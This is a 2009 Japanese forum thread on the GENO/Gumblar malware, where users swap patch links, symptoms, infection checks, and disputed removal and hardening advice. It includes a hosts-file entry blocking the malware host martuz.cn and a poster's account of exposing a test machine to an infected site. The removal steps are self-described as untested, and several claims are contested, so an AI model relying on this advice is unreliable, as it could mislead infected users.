GENOウイルススレ 感染4台目

このエントリーをはてなブックマークに追加
1192.168.0.774
★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
  (9.1.0)
  http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
  (9.1.1↑,をインストールしてから↓を適用)
  http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
  バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
  http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
■ FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。)
  swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい
  そのアタリが比較的楽に設定できるOperaはお勧め
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

■ Vistaの人ははUACをONにする

★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/

★前スレ
GENOウイルススレ 感染3台目
http://pc11.2ch.net/test/read.cgi/internet/1242721365/
2192.168.0.774:2009/05/23(土) 12:44:46 ID:Hx9+/5Qd0
★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html


★感染確認方法
(現状(05/17)では感染が発覚したからといってどうにもできない、安心したい人用)

@regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとレジストリエディタが立ち上がらない。
 ■ 確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。

Aavast!(無料のアンチウイルスソフト)で確認

Bsqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。



★感染した場合
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chmに差し替え
3192.168.0.774:2009/05/23(土) 13:15:54 ID:Sr+xO+q90
イチモツ
4192.168.0.774:2009/05/23(土) 13:20:22 ID:ta6edS2L0
まーたアフィの人がテンプレ変えたな

GENOウイルスチェッカー(アフィリエイトも充実)
ttp://geno.2ch.tc/← アフィリエイト(Amazon) ↓ソース

<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>

Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに ttp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる
5192.168.0.774:2009/05/23(土) 13:21:17 ID:ta6edS2L0
>>1
対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0

最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
6192.168.0.774:2009/05/23(土) 13:30:55 ID:Hx9+/5Qd0
お、俺がチェッカーの管理人だって!?
俺はチェッカーに救われた一般人ですよ
7192.168.0.774:2009/05/23(土) 13:32:50 ID:ta6edS2L0
いやいやだからって何でテンプレ変えちゃうわけ?
そのテンプレ間違えだらけだし、チェッカーも初心者の不安煽るだけじゃん
チェッカー使った初心者が黒ですか白ですかって結局確認しにくるだろうが。
8192.168.0.774:2009/05/23(土) 13:35:44 ID:mqjRjq9C0
間違 え だらけ…
9192.168.0.774:2009/05/23(土) 13:36:28 ID:oHG73gbi0
>>7
馬鹿は黙ってろ
厨獄に帰れ
10192.168.0.774:2009/05/23(土) 13:38:56 ID:F81SI+Tt0
結局あのゴミチェッカーは混乱しか生まなかったしな
11192.168.0.774:2009/05/23(土) 13:41:19 ID:ta6edS2L0
>>8
どっちも正解ですが何か?

>>9
いやだから何でいきなりアフィのテンプレに変えちゃうわけ?
12192.168.0.774:2009/05/23(土) 13:42:21 ID:Hx9+/5Qd0
>>7
またまた君はそんな重箱隅なことを言うだろ
だいたい君、最新版で修正された脆弱性が他のサイトで攻撃されないっていう保証できるの?できないよね?
13192.168.0.774:2009/05/23(土) 13:44:28 ID:ta6edS2L0
>>12
ここはGENOスレな
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html

感染報告やら参照するのにどこでこの脆弱性が修正されたかは明確なほうがいいだろ
14192.168.0.774:2009/05/23(土) 13:47:52 ID:Sr+xO+q90
>>13
GENOウイルススレであろうがなんであろうが、初心者に優しい方がいいに決まってるだろうが
どこで脆弱性が修正されたかなんて一部の知識ある人が勝手に調べればいいだけだっつーの
だいたいそういう知識あるヤツは感染もしないし、アップデートもちゃんとしてる
15192.168.0.774:2009/05/23(土) 13:51:13 ID:F81SI+Tt0
>>14
初心者に優しいスレを目指すなら間違えぐらい直すべき
16192.168.0.774:2009/05/23(土) 13:53:42 ID:soK/x83h0
   /⌒ヽ
  / ´_ゝ`)  お久しぶりですね、すいません、ちょっと ry
  |    /
  | /| | 
  // | | 
 U  .U
17192.168.0.774:2009/05/23(土) 13:53:57 ID:Hx9+/5Qd0
なんだよ
ID:F81SI+Tt0=ID:ta6edS2L0
かよww

必死ダナーwww
18192.168.0.774:2009/05/23(土) 13:54:17 ID:ta6edS2L0
初心者にやさしい対策テンプレが

・hosts追記
・js無効(火狐NoScript推奨)

ねーよ。それならreader更新だけでいいじゃん。
19192.168.0.774:2009/05/23(土) 13:54:21 ID:3BjN7uEa0
間違えの無いようにやっていきたいもんです
20192.168.0.774:2009/05/23(土) 13:56:00 ID:F81SI+Tt0
前スレのテンプレ書き直すか
21192.168.0.774:2009/05/23(土) 13:56:01 ID:ta6edS2L0
>>17
ID:Hx9+/5Qd0
ID:Sr+xO+q90
こうですか?わかりません><
反論出来ないからって、煽りはいいですから。
22192.168.0.774:2009/05/23(土) 13:59:41 ID:YL7Xpp0S0
なになに、昨日だかadobe reader6.0→9.1.0にして
安心してたけど9.1.1じゃないとダメなのかw

(9.1.0をインストールしてから↓を適用)
  ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp

これはreader起動して「アップデートの有無をチェック」ではダメなのん?
23192.168.0.774:2009/05/23(土) 14:00:21 ID:ZVz/t1CW0
新スレいきなり荒れててワロタw

firefoxのNoScript、試したことない人は一度はやってみるのもいい鴨
ただ、だんだん我慢できなくなって外してしまう、遅かれ早かれw

前スレ>>854にチラっと出てたeval関数だけ止めるとかいうやつは
国産オミトロンみたいなもんという理解でいいと思われ

にしても初心者対応は難しいよね。要するに「明日も明後日も絶対安心な方法を教えて!」
って言ってるようなものだからなぁ。そんな方法があれば誰も苦労しませんよ、ないから
こうやって必死に毎日、最新の情報漁ってるというのに・・・
24192.168.0.774:2009/05/23(土) 14:00:50 ID:BPqsEeLX0
sqlsodbc.chmのサイズが1.29 KB (1,323 バイト)だったんだけど…
感染してたのかな。取りあえず削除して入れなおしました。
GENOウイルスチェッカーって信憑性あるの?
どこで感染したか調べたくて、その頃行ったサイト ttp://boox.jp/ 
をチェックしたら危険度106%って出たんだけど。
25192.168.0.774:2009/05/23(土) 14:01:34 ID:OPuerAms0
>>21
反論しないってことな自演してたんですね?
そんなモラルのない人は出て行ってください
26192.168.0.774:2009/05/23(土) 14:02:54 ID:ta6edS2L0
>>22
readerの脆弱性を突いたこのウイルス挙動は9.1.0で対策済
9.1.1へのアップデートは
>これはreader起動して「アップデートの有無をチェック」ではダメなのん?
それでいい
27192.168.0.774:2009/05/23(土) 14:04:14 ID:ta6edS2L0
>>25
意味がわかりません。
28192.168.0.774:2009/05/23(土) 14:05:29 ID:MMIDDv3r0
>>27
厨獄に帰れウジ虫
29192.168.0.774:2009/05/23(土) 14:05:36 ID:Sr+xO+q90
>>21
お前はなにを言っているんだ(AAry

>>18
hosts追記は現時点では無効だけど
noscriptに関しては、新たな脆弱性に対して有効だよね?

>>24
chmがどうたらこうたらはワカランけど
そこは大丈夫だよ
30192.168.0.774:2009/05/23(土) 14:06:46 ID:C376xCRT0
>>24
そこは違うっぽい
そこ以外で感染したサイトを踏んでる
クロなのでOSいれなおしてください
31192.168.0.774:2009/05/23(土) 14:07:21 ID:ZVz/t1CW0
>>1
> http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
> (9.1.1↑,をインストールしてから↓を適用)

今は最初から9.1.1でインストールされる筈 まぁ画面見てればわかるが
32192.168.0.774:2009/05/23(土) 14:08:57 ID:Hx9+/5Qd0
>>27
自演してないなら
意味が分かりませんって返答はないよねww

>>31
mjd?
管理人さんにメールしとくわ
サンクス
33192.168.0.774:2009/05/23(土) 14:09:45 ID:BPqsEeLX0
>>29-30
ありがとう。ここじゃないのか。
CD-ROMがないからOS入れなおせないんだ・・・。
34192.168.0.774:2009/05/23(土) 14:10:18 ID:DahySqY8O
このスレもとうとう消費期限が切れたか…
35192.168.0.774:2009/05/23(土) 14:10:37 ID:jkLej88t0
ID:oHG73gbi0
ID:OPuerAms0
ID:MMIDDv3r0

単発
36192.168.0.774:2009/05/23(土) 14:12:01 ID:OPuerAms0
>>33
>>2の★感染した場合やってみたら?
37192.168.0.774:2009/05/23(土) 14:12:10 ID:jkLej88t0
ID:Hx9+/5Qd0
38192.168.0.774:2009/05/23(土) 14:13:47 ID:YL7Xpp0S0
>>26,31
ありがとう。今アップデートで9.1.1になった。
何か分からないけど昨日9.1をインストールした時点では
verは9.1.0だったんだけど、これでも対策済だったのか。。
39192.168.0.774:2009/05/23(土) 14:19:03 ID:BPqsEeLX0
>>36
★感染した場合やってみた。あとAdobeも最新版にした。
これだけやってれば大丈夫かな?
40192.168.0.774:2009/05/23(土) 14:19:17 ID:jkLej88t0
ttp://www3.atword.jp/gnome/2009/05/19/finally-several-security-venders-detect-gumblaroid-completely/

全撃墜してるのは
AhnLab-V3
AntiVir
AVG
Kaspersky
McAfee-GW-Edition
Microsoft
NOD
Rising
Symantec

avast!でもいいの?
41192.168.0.774:2009/05/23(土) 14:22:32 ID:0Xu3vLQ/0
>>40
今日の日付確認しろw
42192.168.0.774:2009/05/23(土) 14:35:44 ID:F81SI+Tt0
うわーテンプレ書き直そうと思ったけど前のテンプレも結構微妙だー
sqlsodbc.chmのサイズに頼るんじゃなくてレジストリの内容見た方が確実
だと思うんだけどやっぱ初心者向けじゃないか
43192.168.0.774:2009/05/23(土) 14:36:34 ID:C376xCRT0
>>39
こっちも見てみて
駆除方法についてSymantecの説明
http://www.symantec.com/ja/jp/norton/security_response/writeup.jsp?docid=2009-051900-3410-99&tabid=3

ただ、今後のためにもリカバリディスクはあったほうがいいよ
メーカー製PCならHDD内にあるんじゃないのかな
取説みてくれ
44192.168.0.774:2009/05/23(土) 15:00:55 ID:BukbC16CP
対応してるアンチウィルスソフト一覧を貼って下さい
45192.168.0.774:2009/05/23(土) 15:03:38 ID:XxYYorp40
46192.168.0.774:2009/05/23(土) 15:04:20 ID:BPqsEeLX0
>>43
ありがとう。システムの復元機能を無効にしておきました。
取説がOffice XPのしか見当たらないのですが、なんとかリカバリディスクを探してみます。
47192.168.0.774:2009/05/23(土) 15:15:04 ID:MMIDDv3r0
(・∀・)ニヤニヤ
48192.168.0.774:2009/05/23(土) 15:15:46 ID:imZ1efiC0
>>44
1種類じゃなく、何種類も日替わりで出まわっているので、そんな一覧作成できない。

検出可否報告スレを見る限りでは、かなりのベンダーが対応を始めているようだが
完璧に対応していて除去までおっけーなところを聞かれてもわからない。

本体検出の能力と、除去能力は別のものだから。
49192.168.0.774:2009/05/23(土) 15:22:23 ID:F81SI+Tt0
出回ってたの4日も前の話ですよ
50192.168.0.774:2009/05/23(土) 15:22:55 ID:1RJPI6/M0
前スレの984で
-------------
984 名前:192.168.0.774[sage] 投稿日:2009/05/23(土) 09:31:48 ID:Ci5k0h8A0 (PC)
あと、6時間前に立った セキュリティー板のテンプレに
■ポート135を閉じる
■ポート445を閉じる
ってあるんだが、止めさせて方がいいと思うんだが、どうだろう?
-------------------
と書いたんだけど、コメントくれた人。
なかなかレスできなくてごめん。ありがとう。

さっきまで感染疑いの奴と電話で話してたんだが、
確認ステップの途中で「まだあるの〜はぁー」なんてため息つかれちまった。 なんだこの怒り。

/////////
ポート135と445を止める為にサービスを停止するTipsはあっちのスレのテンプレから外した方が良さそうって
のがこっちのスレの意見ってことでOKかな?

だが、検索すると脆弱性情報とか危険なポートなので塞いだ方がいいっていうスタンスのサイトばかりで、
サービスの停止にする事によってポートを塞ぐことによる弊害を説明するのが大変そうだな。

「さっきのスレの最後の方を読んでくれ」だと、こっちに人が増えてマズイか?


>>43
これでも危険度低に分類されるんだね。  じゃあ高ってどんなのだよと思ったが、
ゼロデイじゃないし感染する為の必要条件も複数あるし、攻撃サイトは消えたしなぁ。
51192.168.0.774:2009/05/23(土) 15:31:08 ID:0Xu3vLQ/0
>>50
ちうかRPC停止云々をテンプレから外したほうが〜って話はテンプレに組み込まれた時から言われてたのよw
でもその時は流れ速くてスレ立て人が気付いて無かったり、荒らしがスレ立ててわざと旧テンプレ書いたり
んな流れで残ってるだけ

Port135も445も塞いだほうが良いのは確かだが、GENOにゃ関係無いしテンプレに含まなくても良い(現状ならね)
そしてRPC停止は影響度が高い(依存関係が大量で初心者ほどやっちゃいかん行為)ので正直書いた奴出て来いって感じw
52192.168.0.774:2009/05/23(土) 15:35:41 ID:h8voSB2Y0
rpcssは止めるに止められない【サービス】。
135,445は、外からは入らないようにする【ポート】。
GENO系ウイルスは関連してないが、こっから入られるウイルスは多いので、
巻き添えで話題になってる。関係ないけど、これを機会になんとかしとけ。
53192.168.0.774:2009/05/23(土) 15:37:58 ID:BZCm21Hn0
前スレの結論としてはアドビリーダーを7〜9で更新していれば良かったんじゃないかな

他にアンチウイルスソフトを変えたり、ブラウザのジャバを切ったりするのは確か意味無かったと思う
54192.168.0.774:2009/05/23(土) 15:43:42 ID:BZCm21Hn0
↑アドビリーダーの脆弱性を突いたウイルスだから
それが機能しなかったら他の事をやってみ意味が無いという意味ね
55192.168.0.774:2009/05/23(土) 16:02:04 ID:h8voSB2Y0
Javaを切る: 特に数年前は、他のウイルスをよけるのに意味があったが、今回ウイルスには無効。
JavaScriptを切る: 効果があるが、見られないサイトがかなり出てくる悪感で、対初心者には非現実案。
56192.168.0.774:2009/05/23(土) 16:16:30 ID:BZCm21Hn0
まあいいや、おまいらはご丁寧にウィンドウズの更新も出来なくするような間抜けだから
過剰防壁でも備えたまへ
57192.168.0.774:2009/05/23(土) 16:18:45 ID:1RJPI6/M0
>>52-53
ジャバじゃなくてJavaScriptね。
心配してくれてありがとう。
だが、自分のは、しっかりやってるから大丈夫。

じゃあ、あっちのスレに書いてくるわ。
58192.168.0.774:2009/05/23(土) 16:29:33 ID:4+szvDMsP
>>56
分かっててやってるんだろ、それを言ったら2k/XP以外はそもそも関係ないし
個人的には JavaScript の切り方とかいろいろ試すってのはいい事だと思うぞ
59192.168.0.774:2009/05/23(土) 16:29:35 ID:FQnBqUEn0
チラ裏メモ

■ Adobe Flash Player

Adobe Flash Player のバージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ブラウザ上でアクティブになっている Flash Player と、
最新のバージョンを確認できる。

この書き込み時の最新バージョン : 10,0,22,87

■ Adobe Reader

Adobe Reader のバージョン確認方法
Adobe Reader の[ヘルプ]メニュー→[Adobe Reader X について]

この書き込み時の最新バージョン : 9,1,1
60192.168.0.774:2009/05/23(土) 17:27:28 ID:M+Ygu9WD0
Adobe Readerなんて入れなきゃいいだけでしょ
61192.168.0.774:2009/05/23(土) 17:29:00 ID:jkLej88t0
セキュ板19もアフィのチェッカーのテンプレに書き換えられてるのね
62192.168.0.774:2009/05/23(土) 17:40:34 ID:O9Ovf6/e0
>>60
けだし正解である。
63192.168.0.774:2009/05/23(土) 17:44:20 ID:a8bSNZSK0
>>60
フラッシュもね。
64192.168.0.774:2009/05/23(土) 17:46:07 ID:FMuei+100
>>50
それらのポートは外部に対して閉じておけばいい話で、LAN内で
閉じる必要はない。
ブロードバンド回線を使っているのならルータがあるだろうから、
ルータで閉じておけばいいし、モバイルの場合はFWアプリで
ブロックすればいい。
いずれにしろ、サービスレベルで止めてしまうのは無茶だし、
そもそもGENOに直接関係しているものでもない。
セキュリティ一般の基本みたいなもんだから、テンプレには
必要ないでしょ。
65192.168.0.774:2009/05/23(土) 17:59:00 ID:1RJPI6/M0
>>64
もう書いちまったあとだけど、後押しthx。

>>59
そこ、下の黒文字(現在の Flash Player バージョン)よりも、
テスト結果の赤文字の方が新しいってことあるよ。
つまり、現在の最新バージョンの更新タイミングがめちゃくちゃ遅い(1ヶ月放っておかれるなんてざら)。
はじめは偽サイトかと思って焦ったほどだ。

JRE とかのJavaもだけど、英語サイトで確認するか、その補足程度に使うのがお奨め。

Security bulletins and advisories
http://www.adobe.com/support/security/#flashplayer
66192.168.0.774:2009/05/23(土) 18:30:14 ID:imZ1efiC0
>>61
うむ、アフィチェッカーは、テンプレから外すべきだろう。混乱を招いている上に、テンプレ改変とか、いらんことしかしない。
67192.168.0.774:2009/05/23(土) 18:33:24 ID:Sz6n7xWm0
やべえサブ機感染したかも
文字勝手に打ちまくって制御不能
68192.168.0.774:2009/05/23(土) 18:41:44 ID:5P+JCV3b0
>>67
横で猫がキーボードを踏んでないか見るんだ
69192.168.0.774:2009/05/23(土) 18:47:10 ID:Sz6n7xWm0
>>68
ヘッドフォンがキー押してただけだったわ、すまん。
70192.168.0.774:2009/05/23(土) 18:48:10 ID:IKhyILDB0
>>67-69
笑ったwww
71192.168.0.774:2009/05/23(土) 19:07:35 ID:3BjN7uEa0
おいww
72192.168.0.774:2009/05/23(土) 19:13:06 ID:sQU+1gs30
和んだw
73192.168.0.774:2009/05/23(土) 19:39:42 ID:c4WG3X5q0
>>67-69
不覚にも
74192.168.0.774:2009/05/23(土) 19:41:34 ID:OA8HLuhR0
>>69
俺も似たような経験あるw
あせるよなw
75192.168.0.774:2009/05/23(土) 19:54:11 ID:a/bRTiGj0
>>67-69
なぜ13分もかかったw
76192.168.0.774:2009/05/23(土) 19:56:05 ID:imZ1efiC0
>>67-69
和ませるなw
77192.168.0.774:2009/05/23(土) 20:18:28 ID:kR9G4T450
今は小休止状態みたいなので質問させていただきたいのですが、先週木曜日に初めて
GENOウイルスのことを知ったときに、Adobe関係は全部アンインストールいたしました。
と思っていたのですが後で、もう一度、プログラム一覧を見直したところ、
Korean Fonts Support For Adobe Reader8.1.0というのが残っていました。
どうやら一連のAdobe製品と離れた位置に在ったので見落としていたようです。

そのときは速攻アンインストールしたのですが、後で気になってググってみても、
検索結果は 外国語のページのものが多く、直接Adobeのサイトにも行きましたが、
もう一つ、はっきりとした記述がありません。
私がフォントファイルの意味を もう一つ はっきりと理解していないせいもありますが、
まあアジア拡張言語フォントパックの中の一つらしい というぐらいは分かりました。

そこで、もう一度ダウンロードして、起動させるなりプロパティを見るなりして
正体を確かめようとしたのですが、今度は、(以下、テキトー訳)
このインストールには あなたのシステム上にインストールされたAdobe Reader8.1.0が必要です。
このインストーラーを起動する前に、Adobe Reader8.1.0をインストールしてください
みたいな表示が出て、インストールできません。

これは、いわゆる言語パッチといわれる類のものなのでしょうか? もし、
そうなら放っておいても、単独で起動することはないでしょうから安心ですが……。
そういえば、ファイルサイズも、3.9メガバイトと小さかったように思います。
長文になってしまい、スミマセン。さんざん既出の質問なら、
チラシの裏、乙 で捨て置かれて結構です。
78192.168.0.774:2009/05/23(土) 20:35:03 ID:C376xCRT0
>>77
なんでそこまで長文になったのかわからんけど
Korean Fonts Support For Adobe Reader8.1.0
これはフォントの追加パッケージみたいなもんだとおもう
アンインストールしたならそれで問題ないです
インストールする必要はありません

あとプログラムの追加と削除には出ないIE用FlashPlayerは残ってると思います
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ここでバージョンを確認して最新版をいれてください
79192.168.0.774:2009/05/23(土) 20:41:58 ID:GyZU8Yee0
延々とブルスクが繰り返されるようになって起動しなくなってしまった・・・
もうこの状態になったらどうすればいいのかさっぱりだ
クリーンインストールは無理なのかな?
80192.168.0.774:2009/05/23(土) 20:47:19 ID:F81SI+Tt0
セーフモードでも起動しないならクリーンインストール
81192.168.0.774:2009/05/23(土) 22:00:43 ID:hutaJPqN0
>>79
救出したいデータがあるなら
Puppy等でデータ待避
82192.168.0.774:2009/05/23(土) 22:30:15 ID:C376xCRT0
>>79
クリーンインストールはできるよ
83192.168.0.774:2009/05/23(土) 23:21:47 ID:BukbC16CP
感染したらバックアップソフトで復元すれば大丈夫かな?
84192.168.0.774:2009/05/24(日) 00:47:38 ID:Ai80SDN30
GhostやTrue Imageのような丸々復元するソフトなら大丈夫。
85192.168.0.774:2009/05/24(日) 01:02:36 ID:r2Cbq1zZ0
>>78
うち(XPSP3 FlashPlayer 10)では、プログラムの追加と削除に
adobe Flash Player 10 AcriveX として出るけどな。
まぁ、サイトで確認するのはいいことだと思うけど。

>>83
True ImageのスレッドでSystem Volume Infomation やバックアップの暗号化について訊いている人がいたな。
まぁ、外付けHDDとかに退避した方がより、安全だとは思うけど。

>>81
Puppyって知らなかった。
86192.168.0.774:2009/05/24(日) 01:07:19 ID:heAsx668P
俺も外付けにTrue Imageでバックアップしてるよ
87192.168.0.774:2009/05/24(日) 01:47:33 ID:aJuP8TRJ0
>>78さん、残っていました。アドオンの中に、flash shockwaveが。
いろいろ確認したので、返事が遅くなって、すみません。
アンインストールするときに、確か Firefox用アドオンとIF用プラグインを削除します
とか出たので、自分では残っていないつもりでした。
これは、昔から、スレにいる人には、割と周知の事実なんでしょうか?
もしかしたら最近のスレでも話題に登っていたのかもしれませんが、割と聞き逃していました。
お恥ずかしい限りです。IE7の場合(8と6は未使用のため)「ツール」→「アドオンの管理」→「アドオンの有効と無効」→デフォルトの「現在 Internet Explper で読み込まれて
いるアドオン」で探したときには見つからなくて、他の方法で確認しようとしましたが、
後で入っているのに気がついてからアドオンの有効と無効を見たら、「許可なしで実行される
アドオン」とか他の項目のところには、ちゃんと表示されていました。
まとめも、ざっとですが見にいってきましたが、ちょっと どこに書いてあるか確認できませんでした。

>>なんでそこまで長文になったのかわからんけど

すみません。きっと説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Kor
88192.168.0.774:2009/05/24(日) 01:52:26 ID:aJuP8TRJ0
>>なんでそこまで長文になったのかわからんけど

すみません。きっと、説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Koreanなんちゃらを 自分と同じように
アンインストール派の人で 消し忘れてる人いるだろうけど、これって無害なの?
ってことです。でも、Flash・Shockwaveのほうが、よっぽど恐ろしかったです。
これは、やっぱりアップデート派の人の
ほうが正解かな??

なんで途中で消えたんだろう。あっ、書き込み完了する前に、
タブ移動したからかな。


89192.168.0.774:2009/05/24(日) 02:07:23 ID:2VJlz39B0
>>88
なんか、勘違いしているようだけど、ShockwaveはFlashplayerとは違うよ。
Shockwaveは2006年の2月のが最新
http://www.adobe.com/support/security/#shockwave

Adobe Shockwave と Flash Playerのテスト
http://www.adobe.com/jp/shockwave/welcome/
ここで両方をテストできる。


Shockwaveなんてなくて困らないから、アンインストールしたままがいいだろうけどね。


90192.168.0.774:2009/05/24(日) 02:11:49 ID:dPjaiBoy0
2ch的には収束に向かってるの?
91192.168.0.774:2009/05/24(日) 02:17:06 ID:2b1ExXhKP
Flash Playerが9.0.124.0以上でAdobe Readerが9.1以上なら感染しない
収束しないほうがおかしいだろ
92192.168.0.774:2009/05/24(日) 02:17:24 ID:oOp80I+s0
新ネタ待ち。GENO系の次が出てくるか、別のウイルスが話題になるかはわからない
不安な人は引き続き不安、困ってる人は引き続き困ってるので、解決したってわけじゃない
93192.168.0.774:2009/05/24(日) 02:22:29 ID:HFhRBZx00
USCERTやセキュリティ企業が動き始めた段階でサーバ停止
もう十分な量のボットは確保しただろうし後は儲けるだけなんじゃねえの
94192.168.0.774:2009/05/24(日) 02:23:15 ID:Q8xZKwGm0
感染しても顕著な症状がでないので気付いてない人も多いし。
95192.168.0.774:2009/05/24(日) 02:32:01 ID:jcHTZiwS0
>>4
このウィルスチェッカー置いてるトコが感染する事ないの?
96192.168.0.774:2009/05/24(日) 02:40:08 ID:332mANDn0
Puppyってあるんだな。
試してみようかなー。
97192.168.0.774:2009/05/24(日) 06:37:27 ID:uAVXuYQE0
今頃になって感染するって、どこから拾ってきてんだよ

亜種がどうなるかは知らんけど、
使われてたのは3月に塞がれた穴だったらしいな

なんかもう、感染した奴乙としか言いようがない。
98192.168.0.774:2009/05/24(日) 07:49:59 ID:aJuP8TRJ0
>>89、すみません。呼び名も意味も、全部、間違ってました。
Shockwave Flashは、Flash Playaerの子供みたいなものかと思っていたのですが、
Shockwave Flash は、ActiveXコントロール系だったのですね。まだ、よく分かってませんが。
なんスレか前でスレの皆さんが話してたはずなのに、失念してました。

大手動画サイトが古いバージョンのFlash Playerを勝手に呼び出すと、
どなたかが話してたの思い出して、確かめに回った後だったのに。
ようつべ、にこ動、やふー動画は、ちゃんとFlash Playerが
古いバージョンもしくは入っていません と警告してくれましたよ。
Googleは微妙、いきなりインスコしろ、言ってきた。
99192.168.0.774:2009/05/24(日) 08:31:42 ID:oOp80I+s0
>>95
あらゆる可能性は、ある。ただし、そんな、今注目されてるところが感染したら、
だーれも気づかない(スレで誰も言及してない)ことなんてありえない。ってこと
100192.168.0.774:2009/05/24(日) 08:56:50 ID:GCI88weB0
これホント?

>212  ユキワリコザクラ(関東地方)  []  2009/05/23(土) 22:39:52.90 ID:6wvDjucY
> 
>XPユーザー、慌てるな
>GENOってVistaの場合、UACが有効なら大丈夫
>であれば、XPの場合、常に非管理者権限で使用してれば感染しないぞ
>パワーユーザーに権限を落とせ(必要時のみadminで運用)  
101192.168.0.774:2009/05/24(日) 09:10:20 ID:h/uTUbue0
>>100
思いっきりガセ
102192.168.0.774:2009/05/24(日) 10:01:48 ID:O1GwBAYN0
>>100
「制限付きアカウントで使用」ならホント
103192.168.0.774:2009/05/24(日) 10:08:59 ID:oOp80I+s0 BE:2120544588-2BP(0)
砂箱で実験したとき、Drivers32に書き込めないと失敗することがわかってる
ここへの書き込みは、通常Administrators以上なので、たぶんそうなんだろう
VMで実験した人の確定情報待ち
104192.168.0.774:2009/05/24(日) 10:35:59 ID:O1GwBAYN0
VMじゃないが、実験用に仕立てた実機でmartuz.cn を試した。
汚染サイトに接続すると

Temporary Internet Filesへ侵入→martuz.cn からの本体ダウンロード→
ダウンロードしたウィルスの実行

までは成功するが、レジストリの書き換えと%Root%以下のフォルダへの
書き込みに失敗するので、最終的な感染までは進行しなかった。
XP-SP3の制限付きアカウントでの実験な。
Power Userでは未テスト。防げないような気がするが。
制限アカウントで防いだ後は、キャッシュを消すのを忘れるなよw
105192.168.0.774:2009/05/24(日) 11:07:07 ID:oOp80I+s0
よく考えたら、Power Users はXPHomeとかにはないので、やるならどのみちUsers以下か。
106192.168.0.774:2009/05/24(日) 11:39:01 ID:yKvhjVD20
>>105
Power UsersはWindowsフォルダへの書き込みもできるし、セキュリティ面では
あまり意味がないしね。
